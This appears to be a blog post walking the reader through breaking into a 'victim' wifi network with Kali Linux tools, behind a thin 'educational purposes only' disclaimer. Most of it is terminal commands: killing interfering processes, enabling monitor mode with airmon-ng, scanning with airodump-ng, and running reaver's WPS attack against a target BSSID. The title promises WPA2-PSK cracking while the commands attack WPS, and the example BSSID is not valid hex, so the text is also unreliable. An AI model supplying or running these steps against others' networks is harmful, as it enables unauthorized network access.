Our Android Application, 100K+ Downloads Download
Close ads ->
Close ads ->
-->

Random Posts

Follow US

How to hack wifi (WPA2-PSK) password using Kali Linux 2.0

Share it:

Note : 

  •  Warning..!! WIFI hacking is illegal.
“This video is only for educational purposes. I am not responsible for any consequences.”
So lets Start Cracking..

Step 1: Open Terminal and Find out the name of your wireless adapter. , type ifconfig on a terminal. See the result. (here my wireless adapter is ‘wlan0’)

Step 2:
Type the following commands on terminal.

  • airmon-ng check kill
  • airmon-ng check

Step 3:
Enable Monitor mode. Now, we use a tool called airmon-ng to create a virtual interface called mon. Just type

  • airmon-ng start wlan0

Step 4: Start capturing packets. we’ll use airodump-ng to capture the packets in the air. You’ll see the name of the wifi you want to hack.
  • airodump-ng wlan0mon

then press Ctrl+c

Step5: Copy the BSSID of Victim. And write it on this command.
  • reaver -i wlan0mon -b (BSSID) -vv -K 1
For ex: reaver -i wlan0mon -b B0:5G:54:96:G7:70 -vv -K 1


FOLLOW THE VIDEO : 


Downloads : 
Share it:

HACKING

WIFI HACKING

Post A Comment:

0 comments: